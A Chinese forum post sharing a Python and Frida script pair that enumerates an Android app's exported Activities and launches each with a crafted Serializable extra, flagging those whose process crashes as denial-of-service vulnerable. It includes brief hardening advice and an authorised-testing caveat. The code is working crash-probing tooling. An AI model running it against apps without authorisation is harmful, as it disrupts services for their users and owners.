
[原创]使用frida实现android拒绝服务攻击

2020-11-9 15:34

直接上代码。思路：Python 端用 Frida 拉起目标应用并注入 android_dos.js，脚本在进程内通过 PackageManager 枚举 exported 的 Activity；随后对每个 Activity 重新拉起一个干净的进程，携带一个由 Java.registerClass 动态注册的 Serializable extra 去启动它，再用 adb dumpsys 检查进程是否还在，进程消失即认为该 Activity 可被拒绝服务（推测原因是接收方在读取 extras 反序列化时解析不到该类而抛异常）。防护侧：不需要对外暴露的 Activity 不要设为 exported，读取 Intent extras 时做好异常处理；此脚本仅应用于获得授权测试的应用。
android_dos.py

import os
import subprocess
import time

import frida
 
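def isRunning(packageName):
    """Return True if `packageName` shows up in the foreground ACTIVITY/TASK lines on three consecutive polls.

    Runs ``adb shell dumpsys activity top`` three times, one second apart, and
    keeps only the lines mentioning ACTIVITY or TASK (the same filter the
    original ``grep -e ACTIVITY -e TASK`` applied).  The first poll in which
    the package is absent returns False straight away, so a target that died
    on launch is reported without waiting out the remaining polls.

    Args:
        packageName: Android package name to look for in the dumpsys output.

    Returns:
        True when the package was seen on every poll, False as soon as it is
        missing from one.

    Raises:
        FileNotFoundError: if ``adb`` is not on PATH.  The previous os.popen
            version silently produced empty output in that case, which made
            every activity look like a DoS hit.
    """
    for _ in range(3):
        # Explicit argv and no shell: nothing here is attacker-controlled, but
        # this also avoids the never-closed popen handle of the old version.
        # stderr is left attached to the terminal so adb/device errors stay visible.
        result = subprocess.run(
            ["adb", "shell", "dumpsys", "activity", "top"],
            stdout=subprocess.PIPE,
            universal_newlines=True,
            check=False,
        )
        interesting = [
            line
            for line in result.stdout.splitlines()
            if "ACTIVITY" in line or "TASK" in line
        ]
        if not any(packageName in line for line in interesting):
            return False
        time.sleep(1)
    return True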
 
 
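def startActivity(name, packageName="com.example.lesson7"):
    """Spawn a fresh instance of the target app and ask the injected agent to start activity `name`.

    A new process is spawned for every activity on purpose: a crash caused by
    one activity must not mask (or be confused with) the result for the next
    one, and the caller checks afterwards with isRunning() whether the
    process survived.

    Args:
        name: Fully qualified class name of the activity to launch.
        packageName: Package to spawn and attach to.  Defaults to the original
            hard-coded target so existing callers are unaffected.

    Raises:
        Whatever frida raises if the device is not reachable or the spawn /
        attach fails; those are not caught here.
    """
    device = frida.get_usb_device()
    pid = device.spawn([packageName])
    device.resume(pid)
    time.sleep(1)  # give the app a moment to bring up its Java runtime before attaching
    session = device.attach(pid)
    with open("android_dos.js", encoding="utf-8") as f:
        script = session.create_script(f.read())
    script.on("message", my_message_handler)
    script.load()
    print("start startActiovity: ", name)
    try:
        script.exports.invokefund(name)
    finally:
        # Drop our agent so one session per spawned process does not pile up
        # over the whole scan.  Detaching leaves the app process running; the
        # caller still decides via isRunning() whether the launch killed it.
        try:
            session.detach()
        except Exception as exc:  # noqa: BLE001 - best effort: target may already be gone
            print("detach failed (target may have died):", exc)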
 
 
def my_message_handler(message, payload):
    """Frida ``message`` callback: dump the message dict and its (possibly None) binary payload to stdout."""
    for item in (message, payload):
        print(item)
 
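def _spawn_with_agent(packageName):
    """Spawn a fresh instance of `packageName`, attach, and load android_dos.js.

    Returns:
        (session, script) with the script already loaded so the caller can use
        ``script.exports``.  The caller owns the session and should detach it.
    """
    device = frida.get_usb_device()
    pid = device.spawn([packageName])
    device.resume(pid)
    time.sleep(1)  # let the app initialise its Java runtime before attaching
    session = device.attach(pid)
    with open("android_dos.js", encoding="utf-8") as f:
        script = session.create_script(f.read())
    script.on("message", my_message_handler)
    script.load()
    return session, script


def main():
    """Enumerate the target's exported activities and probe each one for a crash.

    Step 1 spawns the app once only to ask the agent (``invokefunc``) for the
    list of exported activities.  Step 2 then launches every activity in its
    own freshly spawned process via startActivity() and reports the ones after
    which the package is no longer running.
    """
    packageName = "com.example.lesson7"
    session, script = _spawn_with_agent(packageName)
    try:
        exportedActivitys = script.exports.invokefunc()
    finally:
        # The enumeration process is not needed any more; drop our agent.
        session.detach()
    for name in exportedActivitys or []:
        startActivity(name)
        if not isRunning(packageName):
            print("dos_activity is ", name)
        time.sleep(1)


if __name__ == "__main__":
    main()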

android_dos.js

function getAppcontext(){
    // Resolve the application Context from the process-wide ActivityThread singleton.
    const app = Java.use("android.app.ActivityThread").currentApplication();
    return app.getApplicationContext();
}
 
function getServises(){
    // Placeholder: empty body, returns undefined and is never called in this script.
    // Presumably intended to mirror getActivityInfos() for services; left unimplemented.
 
}
 
function getprovider(){
    // Placeholder: empty body, returns undefined and is never called in this script.
    // Presumably intended to mirror getActivityInfos() for content providers; left unimplemented.
 
}
 
function getActivityInfos(){
    // PackageInfo of the hosting package, requested with GET_ACTIVITIES so the
    // `activities` array is populated.  Returns the Frida field wrapper for it.
    const ctx = getAppcontext();
    const pm = ctx.getPackageManager();
    const flags = Java.use("android.content.pm.PackageManager").GET_ACTIVITIES.value;
    return pm.getPackageInfo(ctx.getPackageName(), flags).activities;
}
 
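function getExportedActivitys(){
    // Names of the hosting package's activities whose `exported` flag is set,
    // i.e. the ones another app could target directly.  Note this looks only
    // at `exported`; an activity guarded by android:permission is still listed
    // (it is launched from inside the process here, so that guard does not apply).
    const activityInfos = getActivityInfos();
    // PackageInfo.activities is null when the package declares no <activity>;
    // return an empty list instead of throwing on `.value`.
    if (!activityInfos || !activityInfos.value) {
        return [];
    }
    return activityInfos.value
        .filter(info => info.exported.value)
        .map(info => info.name.value);
}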
 
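function createSerialiZable(){
    // Build an instance of a Serializable class that exists only because Frida
    // registered it in this process.  It is used as an Intent extra; the
    // receiving activity presumably cannot resolve the class when it reads its
    // extras, which is what the DoS probe relies on.
    //
    // Register the class at most once per process (cached on the function
    // object): the original registered it on every call, and defining the same
    // class name twice in one runtime is expected to fail.
    if (!createSerialiZable.klass) {
        createSerialiZable.klass = Java.registerClass({
            name: 'com.example.mySerialiZable',   // the original was missing this comma: a SyntaxError that stopped the script from loading
            implements: [Java.use("java.io.Serializable")],
            methods: {
            }
        });
    }
    return createSerialiZable.klass.$new();
}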
 
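function startActivity(name){
    // Launch activity `name` of the hosting package with the crafted
    // Serializable extra under key "xp_text" (see createSerialiZable).
    const context = getAppcontext();
    const Intent = Java.use("android.content.Intent");
    const intent = Intent.$new();
    intent.setClassName(context, name);
    // We start from the Application context, not an Activity; Android's
    // Context.startActivity() documents that this requires FLAG_ACTIVITY_NEW_TASK,
    // otherwise the framework throws before the target is ever launched and
    // every activity would wrongly look "safe".
    intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK.value);
    intent.putExtra("xp_text", createSerialiZable());
    context.startActivity(intent);
}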
 
function main(){
    // Standalone mode (not used by the Python driver, which goes through rpc.exports):
    // launch every exported activity of this process one after another.
    Java.perform(() => {
        getExportedActivitys().forEach(activityName => {
            console.log(activityName);
            startActivity(activityName);
        });
    });
}
 
// setTimeout(main,100)
rpc.exports = {
    // Called by the Python driver as script.exports.invokefunc(): returns the
    // class names of this package's exported activities.  If the Java VM is
    // not ready yet, Java.perform defers the callback and this returns undefined
    // (same as the original).
    invokefunc() {
        let names;
        Java.perform(() => {
            names = getExportedActivitys();
        });
        return names;
    },
    // Called by the Python driver as script.exports.invokefund(name): launches
    // one activity with the crafted extra (see startActivity).
    invokefund(name) {
        Java.perform(() => {
            startActivity(name);
        });
    },
};


最后于 2020-11-9 15:37 被和蔼的哔哔编辑 ,原因: